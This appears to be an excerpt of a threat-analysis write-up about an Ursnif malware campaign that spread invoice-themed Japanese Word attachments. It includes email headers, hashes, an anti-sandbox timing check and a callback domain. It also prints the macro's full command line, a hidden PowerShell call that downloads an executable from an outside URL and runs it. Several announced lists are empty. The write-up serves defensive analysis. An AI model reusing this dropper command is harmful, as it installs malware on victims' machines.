Malware Delivery Method
docx attachment in email
Document sent as an attachment in the following email:
Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?= From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]> To: <[email protected]> Original attachment name: 原価請求書です277253.docx ("copy of Invoice" when translated) MD5 hash: 85d09006634ab5f2138ac927997accda
Below are the unique sender email addresses observed in the Ursnif campaign which are sending the malicious Documents as email attachments:
And below are the spoofed addresses:
- Detects Sleep Short Circuiting by checking the time difference between time-stamps before and after Sleep function is invoked.
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();
lhzYcTRDtUorLVmdP.ShellExecute(“cmd.eXE”, “/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘https://aedwards.co/wp-includes/IXR/get.php?jgTbz’,’%appdata%xJr23.eXe’); sTarT-PROcess ‘%appdAta%xJr23.exe'”, “”, “open”, 0);
MD5 hash of the downloaded payload:
Downloaded payload will perform the following Network Callback post execution:
Interesting callback domain name:
antispam.city (how ironic)
Whois info shows that this domain was recently registered on 14th August 2017.